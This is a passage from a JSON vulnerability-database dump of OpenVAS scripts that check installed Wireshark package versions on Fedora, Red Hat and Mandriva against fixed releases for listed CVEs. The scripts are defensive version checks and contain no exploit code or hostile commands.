exit(0);\n}\n\n\nif(release == \"RHENT_3\")\n{\n\n if ((res = isrpmvuln(pkg:\"wireshark\", rpm:\"wireshark~1.0.15~EL3.1\", rls:\"RHENT_3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"wireshark-debuginfo\", rpm:\"wireshark-debuginfo~1.0.15~EL3.1\", rls:\"RHENT_3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"wireshark-gnome\", rpm:\"wireshark-gnome~1.0.15~EL3.1\", rls:\"RHENT_3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-25T10:55:24", "description": "Check for the Version of wireshark", "cvss3": {}, "published": "2011-02-04T00:00:00", "type": "openvas", "title": "Fedora Update for wireshark FEDORA-2011-0460", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-2284", "CVE-2010-2287", "CVE-2011-0444", "CVE-2010-2283", "CVE-2010-2286", "CVE-2011-0445"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:862831", "href": "http://plugins.openvas.org/nasl.php?oid=862831", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for wireshark FEDORA-2011-0460\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Wireshark is a network traffic analyzer for Unix-ish operating systems.\n\n This package lays base for libpcap, a packet capture and filtering\n library, contains command-line utilities, contains plugins and\n documentation for wireshark. A graphical user interface is packaged\n separately to GTK+ package.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"wireshark on Fedora 13\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2011-February/053669.html\");\n script_id(862831);\n script_version(\"$Revision: 6626 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:30:10 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-02-04 14:19:53 +0100 (Fri, 04 Feb 2011)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2011-0460\");\n script_cve_id(\"CVE-2010-2287\", \"CVE-2010-2286\", \"CVE-2010-2284\", \"CVE-2010-2283\", \"CVE-2011-0444\", \"CVE-2011-0445\");\n script_name(\"Fedora Update for wireshark FEDORA-2011-0460\");\n\n script_summary(\"Check for the Version of wireshark\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC13\")\n{\n\n if ((res = isrpmvuln(pkg:\"wireshark\", rpm:\"wireshark~1.2.14~1.fc13\", rls:\"FC13\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-02T10:53:59", "description": "Check for the Version of wireshark", "cvss3": {}, "published": "2010-09-07T00:00:00", "type": "openvas", "title": "Fedora Update for wireshark FEDORA-2010-13416", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-2284", "CVE-2010-2287", "CVE-2010-2992", "CVE-2010-2283", "CVE-2010-2995", "CVE-2010-2286", "CVE-2010-2993"], "modified": "2017-12-27T00:00:00", "id": "OPENVAS:1361412562310862371", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310862371", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for wireshark FEDORA-2010-13416\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Wireshark is a network traffic analyzer for Unix-ish operating systems.\n\n This package lays base for libpcap, a packet capture and filtering\n library, contains command-line utilities, contains plugins and\n documentation for wireshark. A graphical user interface is packaged\n separately to GTK+ package.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"wireshark on Fedora 13\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2010-September/046957.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.862371\");\n script_version(\"$Revision: 8250 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-27 08:29:15 +0100 (Wed, 27 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-09-07 07:38:40 +0200 (Tue, 07 Sep 2010)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2010-13416\");\n script_cve_id(\"CVE-2010-2287\", \"CVE-2010-2286\", \"CVE-2010-2284\", \"CVE-2010-2283\", \"CVE-2010-2995\", \"CVE-2010-2992\", \"CVE-2010-2993\");\n script_name(\"Fedora Update for wireshark FEDORA-2010-13416\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of wireshark\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC13\")\n{\n\n if ((res = isrpmvuln(pkg:\"wireshark\", rpm:\"wireshark~1.2.10~1.fc13\", rls:\"FC13\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-14T11:48:22", "description": "Check for the Version of wireshark", "cvss3": {}, "published": "2010-09-07T00:00:00", "type": "openvas", "title": "Fedora Update for wireshark FEDORA-2010-13416", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-2284", "CVE-2010-2287", "CVE-2010-2992", "CVE-2010-2283", "CVE-2010-2995", "CVE-2010-2286", "CVE-2010-2993"], "modified": "2017-12-14T00:00:00", "id": "OPENVAS:862371", "href": "http://plugins.openvas.org/nasl.php?oid=862371", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for wireshark FEDORA-2010-13416\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Wireshark is a network traffic analyzer for Unix-ish operating systems.\n\n This package lays base for libpcap, a packet capture and filtering\n library, contains command-line utilities, contains plugins and\n documentation for wireshark. A graphical user interface is packaged\n separately to GTK+ package.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"wireshark on Fedora 13\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2010-September/046957.html\");\n script_id(862371);\n script_version(\"$Revision: 8109 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-14 07:31:15 +0100 (Thu, 14 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-09-07 07:38:40 +0200 (Tue, 07 Sep 2010)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2010-13416\");\n script_cve_id(\"CVE-2010-2287\", \"CVE-2010-2286\", \"CVE-2010-2284\", \"CVE-2010-2283\", \"CVE-2010-2995\", \"CVE-2010-2992\", \"CVE-2010-2993\");\n script_name(\"Fedora Update for wireshark FEDORA-2010-13416\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of wireshark\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC13\")\n{\n\n if ((res = isrpmvuln(pkg:\"wireshark\", rpm:\"wireshark~1.2.10~1.fc13\", rls:\"FC13\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:39:28", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2011-05-05T00:00:00", "type": "openvas", "title": "Fedora Update for wireshark FEDORA-2011-5569", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-1590", "CVE-2011-1591"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310863048", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310863048", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for wireshark FEDORA-2011-5569\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2011-April/058983.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.863048\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-05-05 07:14:22 +0200 (Thu, 05 May 2011)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"FEDORA\", value:\"2011-5569\");\n script_cve_id(\"CVE-2011-1590\", \"CVE-2011-1591\");\n script_name(\"Fedora Update for wireshark FEDORA-2011-5569\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'wireshark'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC14\");\n script_tag(name:\"affected\", value:\"wireshark on Fedora 14\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC14\")\n{\n\n if ((res = isrpmvuln(pkg:\"wireshark\", rpm:\"wireshark~1.4.6~1.fc14\", rls:\"FC14\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-25T10:55:36", "description": "Check for the Version of wireshark", "cvss3": {}, "published": "2011-05-05T00:00:00", "type": "openvas", "title": "Fedora Update for wireshark FEDORA-2011-5569", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-1590", "CVE-2011-1591"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:863048", "href": "http://plugins.openvas.org/nasl.php?oid=863048", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for wireshark FEDORA-2011-5569\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Wireshark is a network traffic analyzer for Unix-ish operating systems.\n\n This package lays base for libpcap, a packet capture and filtering\n library, contains command-line utilities, contains plugins and\n documentation for wireshark. A graphical user interface is packaged\n separately to GTK+ package.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"wireshark on Fedora 14\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2011-April/058983.html\");\n script_id(863048);\n script_version(\"$Revision: 6626 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:30:10 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-05-05 07:14:22 +0200 (Thu, 05 May 2011)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2011-5569\");\n script_cve_id(\"CVE-2011-1590\", \"CVE-2011-1591\");\n script_name(\"Fedora Update for wireshark FEDORA-2011-5569\");\n\n script_summary(\"Check for the Version of wireshark\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC14\")\n{\n\n if ((res = isrpmvuln(pkg:\"wireshark\", rpm:\"wireshark~1.4.6~1.fc14\", rls:\"FC14\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-17T11:05:48", "description": "Check for the Version of wireshark", "cvss3": {}, "published": "2010-08-06T00:00:00", "type": "openvas", "title": "Mandriva Update for wireshark MDVSA-2010:144 (wireshark)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-2284", "CVE-2010-2287"], "modified": "2018-01-16T00:00:00", "id": "OPENVAS:1361412562310831120", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310831120", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for wireshark MDVSA-2010:144 (wireshark)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"This advisory updates wireshark to the latest version(s), fixing\n several security issues:\n\n Buffer overflow in the ASN.1 BER dissector in Wireshark 0.10.13 through\n 1.0.13 and 1.2.0 through 1.2.8 has unknown impact and remote attack\n vectors (CVE-2010-2284).\n \n Buffer overflow in the SigComp Universal Decompressor Virtual Machine\n dissector in Wireshark 0.10.8 through 1.0.13 and 1.2.0 through 1.2.8\n has unknown impact and remote attack vectors (CVE-2010-2287).\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"wireshark on Mandriva Linux 2009.1,\n Mandriva Linux 2009.1/X86_64,\n Mandriva Linux 2010.0,\n Mandriva Linux 2010.0/X86_64,\n Mandriva Enterprise Server 5,\n Mandriva Enterprise Server 5/X86_64\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2010-08/msg00000.php\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.831120\");\n script_version(\"$Revision: 8438 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-16 18:38:23 +0100 (Tue, 16 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-08-06 10:34:50 +0200 (Fri, 06 Aug 2010)\");\n script_tag(name:\"cvss_base\", value:\"8.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"MDVSA\", value: \"2010:144\");\n script_cve_id(\"CVE-2010-2284\", \"CVE-2010-2287\");\n script_name(\"Mandriva Update for wireshark MDVSA-2010:144 (wireshark)\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of wireshark\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_mes5\")\n{\n\n if ((res = isrpmvuln(pkg:\"dumpcap\", rpm:\"dumpcap~1.0.15~0.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwireshark0\", rpm:\"libwireshark0~1.0.15~0.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwireshark-devel\", rpm:\"libwireshark-devel~1.0.15~0.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"rawshark\", rpm:\"rawshark~1.0.15~0.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tshark\", rpm:\"tshark~1.0.15~0.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"wireshark\", rpm:\"wireshark~1.0.15~0.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"wireshark-tools\", rpm:\"wireshark-tools~1.0.15~0.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64wireshark0\", rpm:\"lib64wireshark0~1.0.15~0.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64wireshark-devel\", rpm:\"lib64wireshark-devel~1.0.15~0.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_2010.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"dumpcap\", rpm:\"dumpcap~1.2.10~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwireshark0\", rpm:\"libwireshark0~1.2.10~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwireshark-devel\", rpm:\"libwireshark-devel~1.2.10~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"rawshark\", rpm:\"rawshark~1.2.10~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tshark\", rpm:\"tshark~1.2.10~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"wireshark\", rpm:\"wireshark~1.2.10~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"wireshark-tools\", rpm:\"wireshark-tools~1.2.10~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64wireshark0\", rpm:\"lib64wireshark0~1.2.10~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64wireshark-devel\", rpm:\"lib64wireshark-devel~1.2.10~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_2009.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"dumpcap\", rpm:\"dumpcap~1.0.15~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwireshark0\", rpm:\"libwireshark0~1.0.15~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwireshark-devel\", rpm:\"libwireshark-devel~1.0.15~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"rawshark\", rpm:\"rawshark~1.0.15~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tshark\", rpm:\"tshark~1.0.15~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"wireshark\", rpm:\"wireshark~1.0.15~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"wireshark-tools\", rpm:\"wireshark-tools~1.0.15~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64wireshark0\", rpm:\"lib64wireshark0~1.0.15~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64wireshark-devel\", rpm:\"lib64wireshark-devel~1.0.15~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 8.3, "vector": "AV:ADJACENT_NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-20T13:18:30", "description": "Check for the Version of wireshark", "cvss3": {}, "published": "2010-08-06T00:00:00", "type": "openvas", "title": "Mandriva Update for wireshark MDVSA-2010:144 (wireshark)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-2284", "CVE-2010-2287"], "modified": "2017-12-19T00:00:00", "id": "OPENVAS:831120", "href": "http://plugins.openvas.org/nasl.php?oid=831120", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for wireshark MDVSA-2010:144 (wireshark)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software 